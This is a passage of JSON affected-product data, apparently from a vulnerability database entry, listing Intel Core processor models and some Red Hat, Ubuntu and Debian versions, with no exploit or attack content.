        "trust": 1.0,
        "vendor": "intel",
        "version": "2617m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3437u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "670"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4422e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4720hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3230m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3317u"
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y54"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3130m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qm"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10a"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4900mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3380m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2405s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3550s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4012y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4722hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3689y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790t"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y30"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2312m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "840qm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2710qe"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6350hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2375m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200h"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570r"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3350p"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4810mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210h"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4120u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "820qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2640m"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y30"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "370m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4112e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4158u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4960hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5750hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2677m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3667u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5500u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2367m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6102e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3687u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600k"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "975"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4000m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610qm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2350m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6200u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4402e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8250u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2348m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4771"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4260u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6360u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2760qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2300"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2820qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2380p"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2115c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2520m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3610me"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "680um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2715qe"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3227u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8600k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3475s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430um"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4005u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2610ue"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517ue"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "530"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8550u"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6157u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2430m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2700k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3115c"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660lm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4785t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4288u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2637m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2125"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "930"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4550u"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y70"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2390t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2629m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "350m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4760hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "460m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "390m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330um"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2649m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3820qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770te"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qe"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y31"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2960xm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7560u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4020y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5950hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820eq"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y51"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5300u"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640lm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4150t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3360m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "450m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6402p"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2130"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2630qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2720qm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2102"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2510e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6320"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3540m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4800mq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675r"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3225"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4860hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3439y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y75"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4278u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "960"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2675qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3537u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700"
      },
      {
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y57"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5675c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "480m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2467m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450p"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "740qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4950hq"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y32"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10c"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2657m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8400"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7600u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "610e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6006u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2620m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3110m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5257u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620le"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "950"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2328m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660ue"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6585r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620um"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "560"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "661"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "650"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "990x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4130t"
      },
      {
        "model": "core i5",
